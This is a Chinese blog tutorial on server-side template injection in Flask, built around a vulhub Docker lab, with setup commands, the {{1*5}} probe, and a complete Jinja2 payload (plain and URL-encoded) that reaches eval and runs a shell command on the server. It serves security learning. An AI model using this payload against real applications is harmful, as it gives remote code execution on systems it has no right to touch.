Python 开发 框架安全:SSTI 模板注入漏洞测试.

什么是 SSTI 模板注入

SSTI (Server-Side Template Injection) 是一种Web应用程序安全漏洞,它发生在应用程序使用模板引擎渲染用户输入时。当应用程序将用户输入直接插入到模板中而不进行充分的过滤和验证时,就可能导致SSTI漏洞。攻击者可以利用这个漏洞注入恶意代码到模板中,从而执行任意命令,窃取敏感信息或者进一步渗透系统。


目录:

[什么是 SSTI 模板注入](#什么是 SSTI 模板注入)

SSTI的主要危害包括:

[开启 漏洞 靶场:](#开启 漏洞 靶场:)

(1)查看目录:

[(2)启用 vulhub 漏洞:](#(2)启用 vulhub 漏洞:)

[(3)进行浏览:主机的 8000 端口.](#(3)进行浏览:主机的 8000 端口.)

[进行 漏洞 测试:](#进行 漏洞 测试:)

[(1)怎么测试框架类型.(浏览器安装插件检测 Wappalyzer )](#(1)怎么测试框架类型.(浏览器安装插件检测 Wappalyzer ))

[(2)测试是否存在漏洞 /?name={{1*5}} 如果等于 5 .存在漏洞.](#(2)测试是否存在漏洞 /?name={{1*5}} 如果等于 5 .存在漏洞.)

[(3) 利用 下面代码 触发漏洞.(代码需要转换为URL)](#(3) 利用 下面代码 触发漏洞.(代码需要转换为URL))


SSTI的主要危害包括:

复制代码
(1)执行任意代码: 攻击者可以注入恶意代码到模板中,从而在服务器上执行任意命令。

(2)访问敏感信息: 攻击者可以利用SSTI漏洞来访问服务器上的敏感信息,如配置文件、数据库凭证等。

(3)系统渗透: 攻击者可以利用SSTI漏洞进一步渗透到整个系统,获取更高权限。

开启 漏洞 靶场:

Web安全:iwebsec || vulhub 靶场搭建.(各种漏洞环境集合,一键搭建漏洞测试靶场)_iwebsec靶场-CSDN博客


(1)查看目录:

复制代码
(1)cd vulhub
 
(2)ls

(2)启用 vulhub 漏洞:

复制代码
(1)cd flask                       // 切换到对应的漏洞目录.
 
(2)cd ssti                        // 切换到对应的漏洞版本.

(3)docker-compose build           // 建立容器

(4)docker-compose up -d           // 启用漏洞环境.

(5)docker ps                      // 查看环境运行状态

(3)进行浏览:主机的 8000 端口.


进行 漏洞 测试:

(1)怎么测试框架类型.(浏览器安装插件检测 Wappalyzer )


(2)测试是否存在漏洞 /?name={{1*5}} 如果等于 5 .存在漏洞.

复制代码
http://172.16.10.19:8000/?name={{1*5}}

(3) 利用 下面代码 触发漏洞.(代码需要转换为URL)

复制代码
('__import__("os").popen("id").read()')

使用 Python 函数,然后对目标主机执行代码 id .(查看用户名.)

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

%7b%25%20%66%6f%72%20%63%20%69%6e%20%5b%5d%2e%5f%5f%63%6c%61%73%73%5f%5f%2e%5f%5f%62%61%73%65%5f%5f%2e%5f%5f%73%75%62%63%6c%61%73%73%65%73%5f%5f%28%29%20%25%7d%0a%7b%25%20%69%66%20%63%2e%5f%5f%6e%61%6d%65%5f%5f%20%3d%3d%20%27%63%61%74%63%68%5f%77%61%72%6e%69%6e%67%73%27%20%25%7d%0a%20%20%7b%25%20%66%6f%72%20%62%20%69%6e%20%63%2e%5f%5f%69%6e%69%74%5f%5f%2e%5f%5f%67%6c%6f%62%61%6c%73%5f%5f%2e%76%61%6c%75%65%73%28%29%20%25%7d%0a%20%20%7b%25%20%69%66%20%62%2e%5f%5f%63%6c%61%73%73%5f%5f%20%3d%3d%20%7b%7d%2e%5f%5f%63%6c%61%73%73%5f%5f%20%25%7d%0a%20%20%20%20%7b%25%20%69%66%20%27%65%76%61%6c%27%20%69%6e%20%62%2e%6b%65%79%73%28%29%20%25%7d%0a%20%20%20%20%20%20%7b%7b%20%62%5b%27%65%76%61%6c%27%5d%28%27%5f%5f%69%6d%70%6f%72%74%5f%5f%28%22%6f%73%22%29%2e%70%6f%70%65%6e%28%22%69%64%22%29%2e%72%65%61%64%28%29%27%29%20%7d%7d%0a%20%20%20%20%7b%25%20%65%6e%64%69%66%20%25%7d%0a%20%20%7b%25%20%65%6e%64%69%66%20%25%7d%0a%20%20%7b%25%20%65%6e%64%66%6f%72%20%25%7d%0a%7b%25%20%65%6e%64%69%66%20%25%7d%0a%7b%25%20%65%6e%64%66%6f%72%20%25%7d

学习链接:第63天:服务攻防-框架安全&CVE复现&Django&Flask&Node.JS&JQuery_哔哩哔哩_bilibili

相关推荐
小虎卫远程打卡app15 分钟前
光通信与视频编码前沿技术综述:从超大容量传输到实时神经网络编码
运维·网络·信息与通信·视频编解码
钛态24 分钟前
Flutter for OpenHarmony:mockito 单元测试的替身演员,轻松模拟复杂依赖(测试驱动开发必备) 深度解析与鸿蒙适配指南
服务器·驱动开发·安全·flutter·华为·单元测试·harmonyos
%小农1 小时前
在cursor中使用server
网络·网络协议·http
小二·1 小时前
威胁情报驱动的安全运营:从IOC到TTPs的深度狩猎实战指南
安全
ivy159868377152 小时前
芯锦科技 HP9117 多协议USB Type-A快充识别芯片
网络·科技·网络协议·5g·信号处理·p2p
西红市杰出青年3 小时前
MCP 的三种数据传输模式教程(stdio / SSE / Streamable HTTP)
网络·网络协议·http·ai
Filotimo_3 小时前
内网穿透概念
网络
云安全助手3 小时前
OpenClaw失控风暴:Meta两小时Sev1级事故,AI智能体集体黑化敲响全球安全警钟
人工智能·安全
昨夜见军贴06163 小时前
AI审核守护生命设备安全:IACheck成为呼吸机消毒效果检测报告的智能审核专家
大数据·人工智能·安全
minji...4 小时前
Linux 进程间通信(三)命名管道
linux·服务器·网络